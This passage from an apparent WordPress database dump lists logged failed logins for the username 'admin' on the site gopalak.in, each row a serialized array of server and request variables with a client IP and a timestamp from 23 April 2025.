Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"43064\";s:11:\"REMOTE_ADDR\";s:13:\"192.64.117.43\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"103\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745401565.830241;s:12:\"REQUEST_TIME\";i:1745401565;}}','192.64.117.43',0,'2025-04-23 15:16:07','1970-01-01 00:00:00'),(93885,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ro-RO,ro;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37320\";s:11:\"REMOTE_ADDR\";s:14:\"67.223.118.141\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745401957.2051711;s:12:\"REQUEST_TIME\";i:1745401957;}}','67.223.118.141',0,'2025-04-23 15:22:38','1970-01-01 00:00:00'),(93886,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"it-IT,it;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:118:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 14_4_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Safari/605.1.15\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"50890\";s:11:\"REMOTE_ADDR\";s:15:\"103.161.172.148\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745402344.8471739;s:12:\"REQUEST_TIME\";i:1745402344;}}','103.161.172.148',0,'2025-04-23 15:29:06','1970-01-01 00:00:00'),(93887,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"uk-UA,uk;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:2:\"98\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"38650\";s:11:\"REMOTE_ADDR\";s:13:\"178.32.112.62\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"98\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745402753.8842211;s:12:\"REQUEST_TIME\";i:1745402753;}}','178.32.112.62',0,'2025-04-23 15:35:55','1970-01-01 00:00:00'),(93888,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:10:\"gzip, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:122:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"45088\";s:11:\"REMOTE_ADDR\";s:13:\"67.205.59.102\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745403128.924633;s:12:\"REQUEST_TIME\";i:1745403128;}}','67.205.59.102',0,'2025-04-23 15:42:10','1970-01-01 00:00:00'),(93889,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"106\";s:15:\"HTTP_USER_AGENT\";s:134:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36 Edg/114.0.1823.67\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"47088\";s:11:\"REMOTE_ADDR\";s:12:\"176.74.26.54\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"106\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745403513.7488129;s:12:\"REQUEST_TIME\";i:1745403513;}}','176.74.26.54',0,'2025-04-23 15:48:35','1970-01-01 00:00:00'),(93890,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"es-ES,es;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"60252\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.200.133\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745403887.0448091;s:12:\"REQUEST_TIME\";i:1745403887;}}','199.188.200.133',0,'2025-04-23 15:54:48','1970-01-01 00:00:00'),(93891,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"101\";s:15:\"HTTP_USER_AGENT\";s:125:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Edg/126.0.0.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35602\";s:11:\"REMOTE_ADDR\";s:15:\"185.199.236.107\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"101\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745404261.4851;s:12:\"REQUEST_TIME\";i:1745404261;}}','185.199.236.107',0,'2025-04-23 16:01:03','1970-01-01 00:00:00'),(93892,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0.1) Gecko/20100101 Firefox/125.0.1\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"53974\";s:11:\"REMOTE_ADDR\";s:13:\"162.0.217.169\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745404630.592474;s:12:\"REQUEST_TIME\";i:1745404630;}}','162.0.217.169',0,'2025-04-23 16:07:12','1970-01-01 00:00:00'),(93893,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"vi-VN,vi;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:19:\"gzip, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"102\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"41308\";s:11:\"REMOTE_ADDR\";s:13:\"198.54.114.37\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745405001.4011819;s:12:\"REQUEST_TIME\";i:1745405001;}}','198.54.114.37',0,'2025-04-23 16:13:22','1970-01-01 00:00:00'),(93894,0,'a:2:{s:8:\"username\";s:5:\"admin\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ko-KR,ko;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"105\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44744\";s:11:\"REMOTE_ADDR\";s:13:\"104.43.93.163\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"105\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745405380.235738;s:12:\"REQUEST_TIME\";i:1745405380;}}','104.43.93.163',0,'2025-04-23 16:19:41','1970-01-01 